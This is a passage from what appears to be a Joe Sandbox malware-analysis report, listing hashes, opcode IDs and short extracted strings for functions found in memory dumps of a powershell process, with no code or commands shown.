                                                                                        • Opcode Fuzzy Hash: b56dfa182a900dae3c534c37d4bd8cf938ba935cc16c5df09a90b68f9fbd2f44
                                                                                        • Instruction Fuzzy Hash: 8031C334A053C5EFDB398E25C4446667BB1EF52613B0881FFC8288B165F775E84ACBA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $^q$$^q$$^q
                                                                                        • API String ID: 0-831282457
                                                                                        • Opcode ID: bd59d553a0f0120055f74b689260232c6292694b9f44a2fb0d12acd628faa964
                                                                                        • Instruction ID: 3800d44b10ab9e3920111d77d6b824e5b4a4594aa30f0abf4f9fb9fcb053d581
                                                                                        • Opcode Fuzzy Hash: bd59d553a0f0120055f74b689260232c6292694b9f44a2fb0d12acd628faa964
                                                                                        • Instruction Fuzzy Hash: 722155B133024F9BDB34456A8A11B23AADADFC5712F34882AE909CB385CD72C858C361
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q
                                                                                        • API String ID: 0-2697143702
                                                                                        • Opcode ID: d14945598c6fc8446081104eec7b1bb14490e0b7c1e43d5379cbbf68a1497fff
                                                                                        • Instruction ID: edcb5da08cdd4c3be729c1e2a865e00616dc54245adb7231b371f65ef145fc7a
                                                                                        • Opcode Fuzzy Hash: d14945598c6fc8446081104eec7b1bb14490e0b7c1e43d5379cbbf68a1497fff
                                                                                        • Instruction Fuzzy Hash: 2C227EB0B002189FC715DB18CD51F9ABBA2EB89304F5085D9D909AF791CB72ED86CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q
                                                                                        • API String ID: 0-2697143702
                                                                                        • Opcode ID: 03e1237d94200d35da7d83b479a889277dccada2bf8193e7ffb920a40086f0de
                                                                                        • Instruction ID: dcb0feeb8f7a242a3ea5e27eea9c0dc664e3cbe7b4ba58c8c2bacb9e75878d09
                                                                                        • Opcode Fuzzy Hash: 03e1237d94200d35da7d83b479a889277dccada2bf8193e7ffb920a40086f0de
                                                                                        • Instruction Fuzzy Hash: 530289B0B1120AEFD714CB98C581FA9BBF2BF89314F548469E805AB751C772EC45CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q
                                                                                        • API String ID: 0-2697143702
                                                                                        • Opcode ID: cf90edb62e5725dbe7d304c186b8ca312eaea2f26e665b36116baf1bb3231fff
                                                                                        • Instruction ID: a9ed32730012cd318c142c74a62f94642736834eee0ed5dba3e1a9729842fc69
                                                                                        • Opcode Fuzzy Hash: cf90edb62e5725dbe7d304c186b8ca312eaea2f26e665b36116baf1bb3231fff
                                                                                        • Instruction Fuzzy Hash: D40288B0B1120AEFD714CB98C581FAABBF2BF89314F548469E805AB751C772EC45CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q
                                                                                        • API String ID: 0-2697143702
                                                                                        • Opcode ID: 8b121ee38c7fa015c6c1d5ecddbc701789ff95d7ebf703c536fcab10b8a220fe
                                                                                        • Instruction ID: be2e8a5a8575ee3c6107d91b2d217b8074c19820b0af4c1adbbdfd29f6012bcd
                                                                                        • Opcode Fuzzy Hash: 8b121ee38c7fa015c6c1d5ecddbc701789ff95d7ebf703c536fcab10b8a220fe
                                                                                        • Instruction Fuzzy Hash: 5CC1D2B0A1024ADFCB14CB58CA41F9EBBB2AF89304F15C569D9056F756CB31EC46CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $^q$$^q
                                                                                        • API String ID: 0-355816377
                                                                                        • Opcode ID: 189ac27083f30ff1f23e8974fb5eb33cea1e023583bef9ec55668dfd7a1edee9
                                                                                        • Instruction ID: b95d07ad7070886e9296593e51238d67a66265acfacd27a25d5214bc992856d3
                                                                                        • Opcode Fuzzy Hash: 189ac27083f30ff1f23e8974fb5eb33cea1e023583bef9ec55668dfd7a1edee9
                                                                                        • Instruction Fuzzy Hash: 882107B12283CE5FD72105364E11BA27FA58FC2611F284497E944CB293D9798858C372
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: 02f272ca9f78fc4145debbed6b4b615fbc20dbbd72b971b357fc190f17dcd749
                                                                                        • Instruction ID: 77049027e19984334d17064b67dc6d125a6d12e6ce261dcde360ed382f1e8c1c
                                                                                        • Opcode Fuzzy Hash: 02f272ca9f78fc4145debbed6b4b615fbc20dbbd72b971b357fc190f17dcd749
                                                                                        • Instruction Fuzzy Hash: B0527DB4A10219DFDB10DB58C941FAABBB2BB84314F14C099E908AF751CB72ED85CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: bd8781ba6e206d35888b3a2666d5ccf914edc69927e768fb486f19724dfba2b8
                                                                                        • Instruction ID: 695121b2bd59eccc21bfd8ce9168a19ad95ed23c4a1a5d708aeed4e552afa5b0
                                                                                        • Opcode Fuzzy Hash: bd8781ba6e206d35888b3a2666d5ccf914edc69927e768fb486f19724dfba2b8
                                                                                        • Instruction Fuzzy Hash: 4B5249B4B10219DFD710CB18C951FAABBA2BB88304F54C499E9099F791CB72ED85CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: bc71037d156679043fc6b07bb6d2900c33f189ab0502cb959d95d6263539165c
                                                                                        • Instruction ID: bbfa7b4f83173b2de03996b1a4e0d980e9312aeedd522e02ce66093c48a092b7
                                                                                        • Opcode Fuzzy Hash: bc71037d156679043fc6b07bb6d2900c33f189ab0502cb959d95d6263539165c
                                                                                        • Instruction Fuzzy Hash: 27527CB4A10219DFDB10DB58C941FAABBB2BB88314F14C099D909AF751CB72ED85CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: 0416a9d0e1a5e1a8d727820fa62df9982f7a90753f42c7275cc8cbc43a9a1941
                                                                                        • Instruction ID: c6f691b8d2b30ade7de7909da7be1806f48b3e1d4f8dc4299a38999800d0fbea
                                                                                        • Opcode Fuzzy Hash: 0416a9d0e1a5e1a8d727820fa62df9982f7a90753f42c7275cc8cbc43a9a1941
                                                                                        • Instruction Fuzzy Hash: E3427DB4B002199FC711DB18CD51FAABBA2EB89304F5081D5D909AF791CB72ED86CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: f6273b0095be37a6d8a456492c549373b8901da9fdcbc471fa11ec72a47d526e
                                                                                        • Instruction ID: 6c27f29254495dcad6cf872cd2bcc03f0d43b1dfc3ef92643022df4981153f23
                                                                                        • Opcode Fuzzy Hash: f6273b0095be37a6d8a456492c549373b8901da9fdcbc471fa11ec72a47d526e
                                                                                        • Instruction Fuzzy Hash: 02226BB4A10219DFD710DB18C951FAABBB2BB84304F50C499E909AF791CB72ED85CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: df546d8162f2314bc74a1181de5f2500ce8bd692bdec3048ed88d016a6c773a2
                                                                                        • Instruction ID: 96ee2471e6f61672e3bae0b0b42ed757c63aa2b094ac331aaf525dbf6c2a8c70
                                                                                        • Opcode Fuzzy Hash: df546d8162f2314bc74a1181de5f2500ce8bd692bdec3048ed88d016a6c773a2
                                                                                        • Instruction Fuzzy Hash: B4126CB07002189FC715DB18CD51FAABBA2EB89304F508599D909AF791CB72ED86CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: f5f45054e5ea97d1d2c120d5f4852dcf0d46db7e02766913c510d3a17a979a56
                                                                                        • Instruction ID: 29464923b0a3cae2b37b76b1c55acc9c3a024d344c459928343abd034cc958fd
                                                                                        • Opcode Fuzzy Hash: f5f45054e5ea97d1d2c120d5f4852dcf0d46db7e02766913c510d3a17a979a56
                                                                                        • Instruction Fuzzy Hash: A821E771B00B05EBDB207A288441B7E76E6DB84352F5440FDD905DB255FB39DA83C7A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: de8c815ca42e583b46ddc48104f9daa9fcd667a89794ce1095ea6903d22558e1
                                                                                        • Instruction ID: 812ab79b3c164e4bc63c417cb9ec85e23e36af6b83b0e7683ecafac367d9686a
                                                                                        • Opcode Fuzzy Hash: de8c815ca42e583b46ddc48104f9daa9fcd667a89794ce1095ea6903d22558e1
                                                                                        • Instruction Fuzzy Hash: 7A01D6313443802FD71997759D51B9E7B53EFC1604F2488ADE04A9F396DD61AC0E8355
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: 5fef2653f91ae7aae75cb84c4725e2b4c3b54e0d8e9afece8ad1e2eb330bd372
                                                                                        • Instruction ID: 79af38aa1572c39cc1b192d0c5bd5a4f88619c3b368fbe9b6f8df3132f959061
                                                                                        • Opcode Fuzzy Hash: 5fef2653f91ae7aae75cb84c4725e2b4c3b54e0d8e9afece8ad1e2eb330bd372
                                                                                        • Instruction Fuzzy Hash: 1AF02B313403002BD71CA6659C51B6F7797EFC4B10F50883CE1094F396DD61EC4A4395
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0718c52289c1b8e22b9e589e52586c7104c9befbf005471bcafb1b77d17d84b5
                                                                                        • Instruction ID: ec2272a175011baea1d6637a72cd1e4bcf8e73de00c66d8f6a4d7db9ffed6885
                                                                                        • Opcode Fuzzy Hash: 0718c52289c1b8e22b9e589e52586c7104c9befbf005471bcafb1b77d17d84b5
                                                                                        • Instruction Fuzzy Hash: 49129E309093949FDB02DF68D894AD9BFF1AF46310F1981DBE484DB2A2C634DD89CB95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914536667.0000000008BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8be0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fdfd86d68df284c431f33117f6a8635f9fbaa828d867ddcedf053b14d6f301de
                                                                                        • Instruction ID: c981ff5152df6aca44c4799cf47a47feb88a2ac016347ec8831c03f45ebefe30
                                                                                        • Opcode Fuzzy Hash: fdfd86d68df284c431f33117f6a8635f9fbaa828d867ddcedf053b14d6f301de
                                                                                        • Instruction Fuzzy Hash: 76022B74A00609DFCB15DFA8D584A9EBBF2FF88311F248159E845AB365C771ED82CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 15e61ee24eeaa26e0f12e1ab2da6db1371f036b0e240f1472fa0f05c9547cce4
                                                                                        • Instruction ID: 8165ebd97d7ee2f40718213bcf0c2c5100e0732325a5da397b5a1c05565d5e82
                                                                                        • Opcode Fuzzy Hash: 15e61ee24eeaa26e0f12e1ab2da6db1371f036b0e240f1472fa0f05c9547cce4
                                                                                        • Instruction Fuzzy Hash: 11A15C35A442089FDB14DFA4D984EADBBF2FF84310F1185A9E406AB365DB34AD49CF80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 48979a63c1628305528e0a9ab6a78313e975693bff7d89966bd80d94bb72df93
                                                                                        • Instruction ID: af9a0b26f128bbc3a2a4a2d2ea9a3ffad09b672bced21dc115c49ad48b174859
                                                                                        • Opcode Fuzzy Hash: 48979a63c1628305528e0a9ab6a78313e975693bff7d89966bd80d94bb72df93
                                                                                        • Instruction Fuzzy Hash: 51B1A0B0A042458FCB06CF58C494AAEFBF1FF49310B1585AAD855DB2A6C735FC51CBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2c2d229e7fd807645725fd4668b0643cdca82372b6591e8ef2f5e0f67b85e5dc
                                                                                        • Instruction ID: c6dee286947a03ba4872f6c832097b4b008f5fcea5c69c8eeafc3c879f5f3188
                                                                                        • Opcode Fuzzy Hash: 2c2d229e7fd807645725fd4668b0643cdca82372b6591e8ef2f5e0f67b85e5dc
                                                                                        • Instruction Fuzzy Hash: 32813A74A04608EFCB14DF58C481E99BBF2FF88315F1981A9D805AB756D732EC46CB61
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8998852b1ac7f6dd2e5b769b62c062fffd5874fb6b2acfce43bccde7155781ca
                                                                                        • Instruction ID: 18961eb72306e7bc3a917822a1513d38b099eaa4dd69565e16b537cdfa289207
                                                                                        • Opcode Fuzzy Hash: 8998852b1ac7f6dd2e5b769b62c062fffd5874fb6b2acfce43bccde7155781ca
                                                                                        • Instruction Fuzzy Hash: 8B813974A04608EFCB14DF58C481E99BBF2FF88315F1985A9D805AB756D732EC42CBA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 73ae32bd1d8814f222b7d1b0b58d77c238d564357378f571b1dd53c6f4da1c76
                                                                                        • Instruction ID: 27a599da6e8c0ae7a619ec35449506fcdd53d9744895509162478b72b294014c
                                                                                        • Opcode Fuzzy Hash: 73ae32bd1d8814f222b7d1b0b58d77c238d564357378f571b1dd53c6f4da1c76
                                                                                        • Instruction Fuzzy Hash: BD712770A002089FDB14DFA4D894BADBBF2FF88304F148469E416AB7A1DB75AD46CF51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0cb0fb3ff2783028fe6ec9a85991e9a169cf1271975cd539d351742ddeff942e
                                                                                        • Instruction ID: e781d7ec143602d569660dc20ef953870d2e2098243378343767ecadca9b8d58
                                                                                        • Opcode Fuzzy Hash: 0cb0fb3ff2783028fe6ec9a85991e9a169cf1271975cd539d351742ddeff942e
                                                                                        • Instruction Fuzzy Hash: 11617B31A04209CFCB14DFA8C894AADBBF6FF88314F1485ADD4069B665DB71AD46CF90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d20849d133867310df0537c9add7201892a34427c592ae0ee4d4b2fc0e200047
                                                                                        • Instruction ID: a437716a248bc3197a7739402fe8e2b7724515fa9634947e92bf27da04851bfc
                                                                                        • Opcode Fuzzy Hash: d20849d133867310df0537c9add7201892a34427c592ae0ee4d4b2fc0e200047
                                                                                        • Instruction Fuzzy Hash: A951B8316002448FDB05DF78C995BADBBF6EF85300F18C4AAD845AB356CB358C46CB51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914536667.0000000008BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8be0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2146fc1a48c61cde8dc930ee225315347e7f28805a611a9c6e6f300151baf181
                                                                                        • Instruction ID: ad26e76eb68add9ea7d631733fec723ea6d0d6d36de46a6bc5caedf654107996
                                                                                        • Opcode Fuzzy Hash: 2146fc1a48c61cde8dc930ee225315347e7f28805a611a9c6e6f300151baf181
                                                                                        • Instruction Fuzzy Hash: 90511C70E00609DFCB15CF9CC8949AEBBB2FF88315B248659E915A73A4D735EC52CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6320074f65d48a3ef7bdbaef0ee01a854a0935b2b6a2ca4948713deb793d7845
                                                                                        • Instruction ID: dfd4ecc4725ff78a1f94a2d79c4ef158ad0dec493900acd8385a51554140e01a
                                                                                        • Opcode Fuzzy Hash: 6320074f65d48a3ef7bdbaef0ee01a854a0935b2b6a2ca4948713deb793d7845
                                                                                        • Instruction Fuzzy Hash: 4D414335A002049FDB08DB79C555BAEBBE7EFC8310F15C469D809AB755CF319C468BA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914536667.0000000008BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8be0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a2515c2a284d94186f40badd0c1a0dc5e149cf814507dd7358395b14c974ba81
                                                                                        • Instruction ID: 7369e3f0dcc97e2640ee71ee9dcbc1bd02cdb10a5b720e30e06e7df738733b8d
                                                                                        • Opcode Fuzzy Hash: a2515c2a284d94186f40badd0c1a0dc5e149cf814507dd7358395b14c974ba81
                                                                                        • Instruction Fuzzy Hash: 9B512B70E00609DFCB15CF9CC4949AEBBB2FF88315B248659E915AB3A4C335EC52CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d6f03920ab110214d6a92b5ac9d08e35e4efa8869dab302faee4879a2457c8e8
                                                                                        • Instruction ID: 007b85ff03d8505b86b6bb6b2db73cc1493b4974a6262cabe2b89b8761fd3b6e
                                                                                        • Opcode Fuzzy Hash: d6f03920ab110214d6a92b5ac9d08e35e4efa8869dab302faee4879a2457c8e8
                                                                                        • Instruction Fuzzy Hash: 55418E31A442149FDB15DBB4C994BAEBBF2EF89750F1444A8E406EB3A1DF349D42CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 46d78f4c60dc62b9ab9ea812b6ea2aefb15e133eaf39637d2d234137b4c11f79
                                                                                        • Instruction ID: ca6f4d2d767a9c3b6e55999affee72f4943d09f089aa90ae4d59edf6fcdb964c
                                                                                        • Opcode Fuzzy Hash: 46d78f4c60dc62b9ab9ea812b6ea2aefb15e133eaf39637d2d234137b4c11f79
                                                                                        • Instruction Fuzzy Hash: 52510835A0020ACFCB04DF68D584AEDBBB2FF88311F1491A8D405AB366D771DC85CBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 462a3cefea6741c227ef8cf1f48d213aea7e5bf9cf41b26e8e914fdd22b63406
                                                                                        • Instruction ID: b005b96765203f3b8cf874bc47086c96914420433d257137bd792edad38fa394
                                                                                        • Opcode Fuzzy Hash: 462a3cefea6741c227ef8cf1f48d213aea7e5bf9cf41b26e8e914fdd22b63406
                                                                                        • Instruction Fuzzy Hash: 32413031A002048FDB08DB79C995BAEBBE7EFC8310F15C469D809AB755DB359C458BA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914536667.0000000008BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8be0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ee784a65f4b44784a75495471d222afba7341d1a0713e3107eb4d7293c32d34d
                                                                                        • Instruction ID: 53e210c053ebc126753c5d629691513dc8ffd227ed5c8136e3d54954ef8bb1f4
                                                                                        • Opcode Fuzzy Hash: ee784a65f4b44784a75495471d222afba7341d1a0713e3107eb4d7293c32d34d
                                                                                        • Instruction Fuzzy Hash: D8410874E005098FCB05CF9CC9849AEBBF1FF48321B248258E955AB3A5D735EC42CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914536667.0000000008BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8be0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1468687c52dac40cf7f7bd300cc08550413f97884afa1de2aa1f5929133970f9
                                                                                        • Instruction ID: 2d59a526dc4304f110fc312122779db7ca2e27fa041a2735a3772df59c62e36a
                                                                                        • Opcode Fuzzy Hash: 1468687c52dac40cf7f7bd300cc08550413f97884afa1de2aa1f5929133970f9
                                                                                        • Instruction Fuzzy Hash: CE41F774E005059FCB15CF9CC9949AEBBF1FF88321B248258E955AB3A5C735AC52CF90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8bd7d5809d6d211a440b0b9ed58b670de5d2c43779afd4b95798476d855210e3
                                                                                        • Instruction ID: 1c2153274c32a2977a6cb4d9f7ca68dfe1b4de0e039566235fc3542a234e26f8
